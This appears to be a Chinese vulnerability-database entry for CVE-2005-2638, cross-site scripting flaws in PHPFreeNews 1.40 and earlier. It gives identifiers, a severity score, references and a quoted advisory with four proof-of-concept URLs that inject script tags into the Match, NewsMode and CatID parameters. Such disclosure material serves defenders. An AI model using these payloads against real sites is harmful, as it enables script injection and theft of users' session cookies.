PHPFreeNews 多个跨站脚本漏洞

PHPFreeNews 多个跨站脚本漏洞

漏洞ID 1109001 漏洞类型 跨站脚本
发布时间 2005-08-17 更新时间 2005-10-20
图片[1]-PHPFreeNews 多个跨站脚本漏洞-安全小百科CVE编号 CVE-2005-2638
图片[2]-PHPFreeNews 多个跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200508-224
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/26161
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-224
|漏洞详情
PHPFreeNews1.40以及之前的版本中存在多个跨站脚本(XSS)漏洞。这使得远程攻击者可以借助于传递到NewsCategoryForm.php中的(1)NewsMode参数,(2)Match或(3)传递到SearchResults.php中的NewsMode参数注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/14590/info
 
PHPFreeNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
 
An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/phpfn/SearchResults.php?Match='><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0
http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert(XSS);</script>
http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert(XSS);</script>&SearchNews=Search&CatID=0
http://www.example.com/phpfn/SearchResults.php?Match="><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0
|参考资料

来源:BID
名称:14590
链接:http://www.securityfocus.com/bid/14590
来源:SECUNIA
名称:16490
链接:http://secunia.com/advisories/16490/
来源:BUGTRAQ
名称:20050817PHPFreeNewsV1.40andpriorMultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112439254700016&w;=2
来源:SECTRACK
名称:1014726
链接:http://securitytracker.com/id?1014726

相关推荐: Macintosh Microsoft Office v. X Network PID检查器服务拒绝漏洞

Macintosh Microsoft Office v. X Network PID检查器服务拒绝漏洞 漏洞ID 1204651 漏洞类型 其他 发布时间 2002-03-08 更新时间 2005-05-02 CVE编号 CVE-2002-0021 CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享